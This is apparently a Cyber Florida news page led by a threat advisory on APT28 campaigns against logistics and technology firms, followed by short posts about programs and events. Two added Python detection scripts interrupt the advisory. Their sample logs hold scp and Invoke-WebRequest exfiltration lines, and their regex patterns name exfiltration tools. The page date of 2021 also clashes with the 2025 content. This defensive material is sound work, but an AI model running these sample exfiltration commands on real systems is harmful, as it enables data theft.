News

September 9, 2021

Russian GRU Targeting Western Logistics Entities and Technology Companies

I. Targeted Entities

  • Western logistics entities and technology companies involved in transportation and coordination of aid to Ukraine.
  • Defense industry entities
  • Transportation hubs (ports, airports)
  • Maritime sectors
  • Air traffic management systems
  • IT services

II. Introduction

Since early 2022, the Russian General Staff Main Intelligence Directorate (GRU), specifically its 85th Main Special Service Center (85th GTsSS), also identified as APT28, Fancy Bear, Forest Blizzard, and BlueDelta, has been actively conducting cyber espionage operations against Western logistics and technology entities. This ongoing campaign primarily targets entities facilitating foreign assistance to Ukraine, highlighting a strategic effort to monitor, disrupt, or influence the flow of aid to Ukraine.

Attack Details: The GRU unit 26165 has leveraged sophisticated cyber espionage tactics, including credential guessing, spearphishing, exploitation of known vulnerabilities, and abuse of internet-facing infrastructure such as corporate VPNs. Notable vulnerabilities exploited in this campaign include CVE-2023-23397 (Outlook NTLM), CVE-2023-38831 (WinRAR), and several Roundcube vulnerabilities (CVE-2020-12641, CVE-2020-35730, CVE-2021-44026).

Recent analysis highlights the GRU’s use of geopolitical event lures, notably exploiting the Israel-Hamas conflict to deliver the HEADLACE malware, enabling comprehensive network penetration and persistent espionage (Mühr, Zaboeva, & Fasulo, 2025).

III. MITRE ATT&CK Framework

Initial Access:

  • Exploitation of Public-Facing Applications (T1190)
    • Exploited known vulnerabilities in publicly accessible applications such as Microsoft Exchange and corporate VPNs to achieve initial entry.
  • Spearphishing (T1566)
    • Distributed carefully crafted phishing emails using contextually relevant geopolitical lures (e.g., Israel-Hamas conflict) to trick users into executing malicious payloads.
  • Brute Force and Credential Guessing (T1110)
    • Conducted systematic credential guessing and brute force attacks targeting exposed remote services, including RDP and VPN logins.
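As an added illustration of the credential-guessing activity listed above (this is example code, not code from the advisory or from Cyber Florida), the following Python script applies a sliding-window threshold to constructed failed-logon records and also matches source addresses against indicators written in the advisory's defanged `1[.]2[.]3[.]4` form. The log format, threshold, window and all addresses are assumptions constructed for the example.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Indicators in the advisory's defanged notation ("103[.]97[.]203[.]29" style).
# These two addresses are constructed placeholders, not indicators from the advisory.
DEFANGED_IOCS = ["203[.]0[.]113[.]45", "198[.]51[.]100[.]7"]


def refang(indicator: str) -> str:
    """Turn '203[.]0[.]113[.]45' into '203.0.113.45' so it can be compared with log fields."""
    return indicator.replace("[.]", ".")


IOC_SET = {refang(i) for i in DEFANGED_IOCS}

# Constructed sample records in a simplified Windows Event 4625 (failed logon) shape:
#   <ISO timestamp> 4625 user=<account> src=<source IP> type=<logon type>
SAMPLE_LOG = """\
2025-05-01T08:00:01 4625 user=jdoe src=203.0.113.45 type=10
2025-05-01T08:00:04 4625 user=asmith src=203.0.113.45 type=10
2025-05-01T08:00:09 4625 user=admin src=203.0.113.45 type=10
2025-05-01T08:00:15 4625 user=svc_backup src=203.0.113.45 type=10
2025-05-01T08:00:20 4625 user=root src=203.0.113.45 type=10
2025-05-01T08:01:00 4625 user=jdoe src=192.0.2.10 type=10
2025-05-01T09:30:00 4625 user=jdoe src=192.0.2.10 type=10
2025-05-01T09:31:00 4625 user=hr01 src=198.51.100.7 type=10
"""

LINE_RE = re.compile(r"^(\S+) 4625 user=(\S+) src=(\S+) type=(\d+)$")


def parse(log_text: str):
    """Return (timestamp, user, source_ip, logon_type) tuples; malformed lines are skipped."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            events.append((datetime.fromisoformat(m.group(1)), m.group(2), m.group(3), int(m.group(4))))
    return events


def detect(events, threshold: int = 5, window: timedelta = timedelta(minutes=2)):
    """Map source IP -> list of reasons. A source is flagged when it is a known IOC or
    when it produces `threshold` failed logons inside `window` (credential guessing, T1110).
    Counting distinct accounts separates password spraying from one mistyped password."""
    alerts = defaultdict(list)
    recent = defaultdict(deque)   # source IP -> failure timestamps still inside the window
    users = defaultdict(set)      # source IP -> distinct accounts attempted
    for ts, user, src, _ in sorted(events):
        users[src].add(user)
        if src in IOC_SET and "known IOC source" not in alerts[src]:
            alerts[src].append("known IOC source")
        q = recent[src]
        q.append(ts)
        while ts - q[0] > window:   # drop failures that fell out of the sliding window
            q.popleft()
        if len(q) >= threshold and not any(r.startswith("burst") for r in alerts[src]):
            alerts[src].append(f"burst: {len(q)} failures within {window.seconds}s across {len(users[src])} accounts")
    return {src: reasons for src, reasons in alerts.items() if reasons}


if __name__ == "__main__":
    for src, reasons in detect(parse(SAMPLE_LOG)).items():
        print(src, "->", "; ".join(reasons))
```

The second source (192.0.2.10) produces two failures more than an hour apart and is not flagged, which is the behaviour you want for an ordinary mistyped password.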

Execution:

  • Command and Scripting Interpreter (T1059)
    • Adversaries run arbitrary commands, scripts, or binaries on target systems through built-in interpreters such as PowerShell, cmd.exe, Bash, Python, JavaScript, AppleScript, and Visual Basic; T1059 is among the most prevalent execution techniques in MITRE ATT&CK.
  • User Execution (T1204)
    • Deployed malicious attachments and phishing links designed to prompt users into inadvertently executing malicious scripts or payloads.

Persistence:

  • Scheduled Task (T1053)
    • Established scheduled tasks to regularly execute malicious scripts and maintain long-term access.
  • Shortcut Modification (T1547.009)
    • Altered desktop shortcuts to point to malicious executables, ensuring persistent and subtle execution during regular user operations.

Privilege Escalation:

  • Abuse of Elevation Control Mechanisms (T1548)
    • Exploited software vulnerabilities, notably CVE-2023-23397, enabling unauthorized elevation of privileges to access sensitive resources.

Credential Access:

  • Credential Dumping (T1003)
    • Harvested credentials through techniques such as memory scraping, registry dumps, and exploitation of NTLM hashes.
  • Exploitation of NTLM Vulnerability (CVE-2023-23397)
    • CVE-2023-23397 is a critical “zero-touch” elevation-of-privilege vulnerability in Microsoft Outlook for Windows that allows attackers to exfiltrate a user’s Net-NTLMv2 hash without any user interaction.

Lateral Movement:

  • Remote Desktop Protocol (T1021.001)
    • Employed Remote Desktop Protocol to navigate laterally through compromised networks, enhancing the attacker’s reach and access.
  • Use of tools such as Impacket and PsExec
    • Impacket is a Python-based collection of modules that allows attackers to craft and send network protocol packets, making it particularly useful for exploiting protocols like SMB, RDP, and Kerberos. It’s frequently used to perform pass-the-hash, NTLM relay, and DCSync attacks.
    • PsExec, part of Microsoft Sysinternals, enables remote execution of processes and is commonly used by adversaries to run commands or deploy payloads across a network without needing remote desktop access.

Discovery:

  • Active Directory Enumeration (T1087)
    • Mapped organizational structures by enumerating Active Directory objects to identify high-value targets.
  • Network Service Scanning (T1046)
    • Conducted extensive internal scans post-compromise to locate vulnerable or exploitable network services.

Command and Control:

  • Application Layer Protocol (T1071)
    • Used standard protocols such as HTTP(S) and DNS to blend malicious traffic with legitimate communications, complicating detection efforts.
  • Legitimate Web Services (T1102)
    • Leveraged trusted cloud and hosting services to host command and control infrastructure, reducing suspicion and bypassing traditional network defenses.

Exfiltration:

  • Data Exfiltration via Command and Control Channel (T1041)
  • Archive Collected Data (T1560)
    • Compressed and encrypted sensitive data into ZIP files using PowerShell scripts for exfiltration.

Exfiltration summary:

Phase                | Technique | Description
Data Prep            | T1560.001 | ZIP compression via PowerShell
Exfiltration Channel | T1041     | Upload via C2 (SSH or API)
Tools                |           | Impacket, PsExec, Certipy, ADExplorer, SSH
Timing Strategy      |           | Periodic bursts, geo-proximity, stealth scheduling
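As an added example (not part of the advisory or Cyber Florida's own tooling), the correlation below tags constructed PowerShell script-block log records with the two techniques the advisory pairs for exfiltration, T1560.001 (archiving with Compress-Archive) and T1041 (sending the archive out over SSH or an HTTP API), and alerts when the same host does both within a short window. The log shape, hosts, users, paths, the 30-minute window and the address are all placeholders assumed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample PowerShell script-block records (simplified Event 4104 shape):
#   <ISO timestamp> host=<name> user=<account> script=<script text>
# Hosts, users, paths and the 203.0.113.50 address are placeholders, not advisory IOCs.
SAMPLE_LOG = r"""
2025-05-02T01:10:00 host=WS-17 user=jdoe script=Compress-Archive -Path C:\Users\jdoe\Documents\* -DestinationPath C:\Windows\Temp\out.zip
2025-05-02T01:12:30 host=WS-17 user=jdoe script=scp C:\Windows\Temp\out.zip upload@203.0.113.50:/in/
2025-05-02T03:00:00 host=SRV-02 user=backup script=Compress-Archive -Path D:\logs\* -DestinationPath D:\archive\logs.zip
2025-05-02T09:00:00 host=WS-04 user=asmith script=Invoke-WebRequest -Uri https://api.example.net/v1/files -Method Post -InFile C:\temp\stage.zip
"""

LINE_RE = re.compile(r"^(\S+) host=(\S+) user=(\S+) script=(.*)$")

# Patterns for the two techniques the advisory pairs for exfiltration.
TECHNIQUES = {
    "T1560.001": re.compile(r"Compress-Archive|ZipFile\]::Create|System\.IO\.Compression", re.I),
    "T1041": re.compile(r"\b(?:scp|sftp|ssh)\b|Invoke-WebRequest\b.*-(?:Method\s+Post|InFile)\b|\bcurl(?:\.exe)?\b.*\s-T\b", re.I),
}


def parse(log_text: str):
    """Return (timestamp, host, user, script) tuples; non-matching lines are skipped."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            events.append((datetime.fromisoformat(m.group(1)), m.group(2), m.group(3), m.group(4)))
    return events


def tag(script: str):
    """ATT&CK technique IDs whose pattern occurs in the script text."""
    return [tid for tid, rx in TECHNIQUES.items() if rx.search(script)]


def correlate(events, window: timedelta = timedelta(minutes=30)):
    """Alert when a host stages an archive (T1560.001) and then sends data out (T1041)
    within `window`. Each alert is (host, user, archive_time, upload_time). A lone
    Compress-Archive (e.g. a backup job) or a lone upload does not alert on its own."""
    staged = defaultdict(list)   # host -> [(archive_time, user)]
    alerts = []
    for ts, host, user, script in sorted(events):
        tags = tag(script)
        if "T1560.001" in tags:
            staged[host].append((ts, user))
        if "T1041" in tags:
            for archive_ts, _ in staged[host]:
                if timedelta(0) <= ts - archive_ts <= window:
                    alerts.append((host, user, archive_ts, ts))
    return alerts


if __name__ == "__main__":
    for host, user, a, u in correlate(parse(SAMPLE_LOG)):
        print(f"{host}: {user} archived at {a.time()} and uploaded at {u.time()}")
```

Only WS-17 alerts: SRV-02 archives without uploading and WS-04 uploads without a preceding archive, so both stay below the correlation threshold and would be reviewed as single-technique signals instead.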

IV. Indicators of Compromise (IOCs)

  • IP Addresses observed in brute force activities:
  • Outlook CVE Exploitation IOCs

  • Commonly Used Webmail Providers:
    • portugalmail[.]pt
    • mail-online[.]dk
    • email[.]cz
    • seznam[.]cz
  • Malicious Archive filenames
    • calc.war.zip
    • Zeyilname.zip
    • news_week_6.zip
    • war.zip
    • SEDE-PV-2023-10-09-1_EN.zip
    • Roadmap.zip
  • Malicious scripts/tools observed:
    • HEADLACE (backdoor)
      • A backdoor used to establish persistent access, execute commands remotely, and maintain stealth communication channels with the attackers.
    • MASEPIE (malware)
      • Custom malware designed for executing remote commands, data theft, and maintaining a persistent foothold within compromised networks.
    • STEELHOOK (credential theft)
      • Specialized malware created to extract and exfiltrate sensitive user credentials, aiding further lateral movement and deeper infiltration.

V. Recommendations

  • Patch Known Vulnerabilities:
    • Regularly update all software and firmware.
    • Conduct continuous vulnerability assessments to identify and mitigate security gaps.
  • Enhance Detection and Monitoring:
    • Deploy endpoint detection and response (EDR) systems.
    • Utilize behavioral analysis tools to detect anomalous activities.
  • Strengthen Authentication Practices:
    • Implement multi-factor authentication (MFA).
    • Regularly audit user permissions and account activities.
  • Network Security:
    • Employ network segmentation.
    • Block unauthorized VPN and proxy services.
  • User Awareness:
    • Conduct regular security training focusing on recognizing phishing and social engineering tactics.
  • Incident Response Preparation:
    • Establish and routinely test incident response protocols to quickly contain and remediate intrusions.

VI. Conclusion

Given the strategic nature of this campaign targeting critical logistical infrastructure, Western logistics and technology entities must maintain heightened vigilance. Employing comprehensive security measures and regular training will be crucial in mitigating the ongoing threat posed by the GRU’s advanced cyber espionage operations.

VII. References

MITRE ATT&CK. (n.d.). Command and Scripting Interpreter, Technique T1059 – Enterprise. https://attack.mitre.org/techniques/T1059/

MITRE ATT&CK. (n.d.). Exfiltration Over C2 Channel, Technique T1041 – Enterprise. https://attack.mitre.org/techniques/T1041/

Insikt Group. (2025, April 30). France Ties Russian APT28 to Attacks Targeting French Infrastructure and Institutions. Recorded Future. https://app.recordedfuture.com/portal/research/insikt/doc:5pGMcT?organization=uhash%3A5SiRB4MNDF

Insikt Group. (2024, May 30). GRU’s BlueDelta Targets Key Networks in Europe with Multi-Phase Espionage Campaigns. Recorded Future. https://go.recordedfuture.com/hubfs/reports/CTA-RU-2024-0530.pdf

Lesnewich, G., & Giering, C. (2023, December 5). TA422’s dedicated exploitation loop – the same week after week. Proofpoint. https://www.proofpoint.com/us/blog/threat-insight/ta422s-dedicated-exploitation-loop-same-week-after-week

Martin, A. (2025, May 21). Western intelligence agencies unite to expose Russian hacking campaign against logistics and tech firms. The Record. https://therecord.media/western-intelligence-alert-russia-hackers-logistics-fancy-bear-apt28

Microsoft Incident Response. (2025, June 18). Guidance for investigating attacks using CVE-2023-23397. Microsoft Security Blog. https://www.microsoft.com/en-us/security/blog/2023/03/24/guidance-for-investigating-attacks-using-cve-2023-23397

Mühr, G., Zaboeva, C., & Fasulo, J. (2025, April 17). ITG05 operations leverage Israel-Hamas conflict lures to deliver Headlace malware. IBM. https://www.ibm.com/think/x-force/itg05-ops-leverage-israel-hamas-conflict-lures-to-deliver-headlace-malware

Ribeiro, A. (2025, May 25). Russian GRU’s unit 26165 conducts two-year cyber espionage on logistics, tech firms using IP cameras, supply chains. Industrial Cyber. https://industrialcyber.co/cisa/russian-grus-unit-26165-conducts-two-year-cyber-espionage-on-logistics-tech-firms-using-ip-cameras-supply-chains/

U.S. Department of Defense. (2025, May). Russian GRU Targeting Western Logistics Entities and Technology Companies. https://media.defense.gov/2025/May/21/2003719846/-1/-1/0/CSA_RUSSIAN_GRU_TARGET_LOGISTICS.PDF

Cybersecurity and Infrastructure Security Agency (CISA). (2025, May 21). Russian GRU Targeting Western Logistics Entities and Technology Companies. https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-141a

Threat Advisory created by The Cyber Florida Security Operations Center. Contributing Security Analyst(s): Kevin Wong, Jason Doan

Posted: 2025-06-27T09:30:56-04:00

Protecting Against Elder Fraud and Scams: A Cybersecurity Guide

This resource offers practical steps to help protect older adults and those who support them against cyber elder fraud. Older adults are increasingly targeted by cybercriminals who exploit trust, unfamiliarity with technology, and financial vulnerability. From phishing scams to tech support fraud and identity theft, these attacks often result in significant emotional and financial harm.

Read on for information on common elder scams, best practices for keeping personal information protected, and where and how to report cyber elder fraud.

Guide created by the Cyber Florida Security Operations Center. Contributing Security Analysts: Lara Radovanovic, Zahid Rahman, Waratchaya Luangphairin

Posted: 2025-06-30T12:19:09-04:00

CIP Flash Bulletin | Heightened Iranian Cyber Threat Activity

This special Critical Infrastructure Protection Flash Bulletin outlines increased cyber threat activity linked to Iran amid rising regional tensions. It highlights Iran’s history of targeting U.S. infrastructure, current threat actors and tactics, key vulnerabilities, and priority mitigation strategies. Critical infrastructure sectors are advised to stay vigilant and implement immediate protections. The bulletin also includes federal resources and recommendations to strengthen preparedness.

Posted: 2025-06-23T14:22:51-04:00

Student Spotlight: Kailyn Roach


Student: Kailyn Roach

School: Jupiter High School

District: Palm Beach County

Meet Kailyn Roach, a standout cybersecurity student at Jupiter High School in Palm Beach County, Florida. Kailyn has recently accepted a position as a programming intern with Neuro Building Systems.

Over the past three years, she has actively participated in the CSHS cybersecurity program and consistently competed in academic competitions, excelling in science and technology courses. With an impressive 4.96 GPA, Kailyn also shines outside the classroom as a competitive soccer player—earning the President’s Cup three years in a row—and holds multiple certifications in Java, JavaScript, and various engineering disciplines.

Beyond academics and athletics, Kailyn enjoys surfing, skiing, and practicing martial arts. Passionate about entering the field of cybersecurity, she hopes to contribute to advancements in ophthalmology by bridging the gap between medical professionals and the technology that supports them.

Do you teach a great student who should be featured in our Student Spotlight?
Please complete the form below!

Posted: 2025-06-17T15:54:41-04:00

Teacher Spotlight: Christopher Aaron


Teacher: Christopher Aaron

County: Nassau

Chris Aaron is a standout teacher in Nassau County. This year marks a double milestone: it’s Chris’s first year as an educator and the district’s inaugural year offering cybersecurity and network security courses. He holds a bachelor’s degree in cybersecurity management and is currently pursuing a master’s degree in the same field.

Chris says, “Cyber education plays a vital role in equipping individuals to navigate the digital landscape securely and responsibly, empowering them to protect themselves and their data from evolving threats.”

Chris shares that one of the most rewarding aspects of teaching cybersecurity is seeing students grow in their confidence in staying safe online. Supporting this development is especially fulfilling in a field that is constantly evolving and full of opportunities for continued learning and advancement.

We are so grateful for Chris’s dedication to cybersecurity education and his commitment to students across Florida.

Would you like to be featured in our Teacher Spotlight? To nominate yourself or another deserving teacher, complete the interest form below!

Posted: 2025-06-12T09:04:59-04:00

No Password Required Podcast Episode 60 — Reginald “Andre” Andre


Posted: 2025-06-09T08:14:34-04:00

Virtual Cyber Workshop for Critical Infrastructure, Aug 27, 2025

Virtual Cybersecurity Workshop for Critical Infrastructure

August 27, 2025 | 8:30am – 12 Noon

Cyber Florida’s Critical Infrastructure Protection (CIP) Workshop brings together public-sector leaders, IT professionals, and emergency managers to tackle real-world cyber threats facing Florida’s essential services. These hands-on sessions deliver practical tools, expert insights, and interactive scenarios designed to help SLTT agencies strengthen their cyber resilience and readiness.

  • Receive actionable recommendations for enhancing compliance with Florida Statute 282.318
  • See an overview of Cyber Florida’s no-cost solutions and services to strengthen your organization’s cyber defenses.
  • Engage in an exciting tabletop exercise hosted by the National Cybersecurity Preparedness Consortium (NUARI), offering hands-on experience in responding to cyber incidents.

Whether you’re securing water systems, transportation networks, or municipal services, these workshops are your front line in building a safer Florida. Don’t miss this chance to improve your cybersecurity posture and resilience!

Posted: 2025-09-05T12:57:52-04:00

NIST Report Progress


Sustainable, Hands-on and Multi-disciplinary Cybersecurity Skills Training to Meet Workforce Needs of Critical Infrastructure Sectors in Florida

A Report of Project Progress by Cyber Florida at USF

In Spring 2024, Cyber Florida was awarded a two-year, $200,000 grant from the National Institute of Standards and Technology (NIST) for its project “Sustainable, Hands-on and Multi-disciplinary Cybersecurity Skills Training to Meet Workforce Needs of Critical Infrastructure Sectors in Florida”, funded under NIST’s Regional Alliances and Multistakeholder Partnerships to Stimulate Cybersecurity Education and Workforce Development (RAMPS) program.

The overall goals of the project are to: a) solicit core cybersecurity workforce needs both within and across critical infrastructure (CI) sectors in Florida; b) analyze and summarize findings on entry-level workforce needs; c) design a semester-long, practical, hands-on cybersecurity training program for students that meets entry-level CI workforce needs; d) connect the first cohort of trained students to CI sectors via internships and full-time positions; and e) evaluate outcomes across multiple metrics, including student self-assessment, industry expert assessment, and program sustainability and scalability across institutions and CI sectors in Florida.

Based on survey responses, we identified tangible gaps in entry-level workforce needs across CI sectors in Florida and began designing a 14-week hands-on training program for students. The program was also designed around the components of the Workforce Framework for Cybersecurity (NICE Framework) published by NIST on March 5, 2024, which contains Task, Knowledge, and Skill (TKS) Statements; Work Role Categories and Work Roles; and Competency Areas for the cybersecurity workforce. The framework is publicly available at https://www.nist.gov/itl/applied-cybersecurity/nice/nice-framework-resource-center.

We recruited our first cohort of five students for this semester-long program from the newly formed Bellini College of AI, Cybersecurity and Computing (CAICC) at the University of South Florida in January 2025. The five students went through our 14-week program centered on three foundational pillars: a) Basic Security Blue Team Level 1 (BTL1) training for one month; b) an Industrial Control Systems foundational course via the Aligned Realistic Cyberattack Simulation (ARCS) platform offered by SimSpace for one month; and c) the ICS/SCADA Security Essentials course offered by the SANS Institute. Students are eligible for a BTL1 certificate and for the Global Industrial Cyber Security Professional (GICSP) certification in Industrial Control Systems upon completing a) and c). In addition, throughout the program, students take part in Backdoors and Breaches exercises, participate in mock security operations center (SOC) intelligence briefs, and read state-of-the-art research papers and trends in cyber-centered critical infrastructure protection.

Multiple critical infrastructure entities in Florida participated in student engagement activities in Spring 2025, including Tampa Airport, Tampa General Hospital, Talquin Coop and Seminole Electric. Our next cohort of students starts in Fall 2025, and you are welcome to engage with Cyber Florida and our students in the program. Post-training, we expect our students to meet internship and entry-level workforce requirements in cybersecurity for critical infrastructure sectors in Florida.

Posted: 2025-06-04T13:01:30-04:00

CIPP Update: June 2025

CI Mapping

Cyber Florida has employed geospatial analytics and cybersecurity assessments to improve visibility into Florida’s vital infrastructure, enabling more effective coordination, risk mitigation, and rapid response efforts across state agencies.

Leveraging advanced technology to identify critical infrastructures significantly improves state leadership’s situational awareness and decision-making in all-hazards planning and preparedness.

Critical Infrastructure Protection Program Timeline

Posted: 2025-06-04T12:43:42-04:00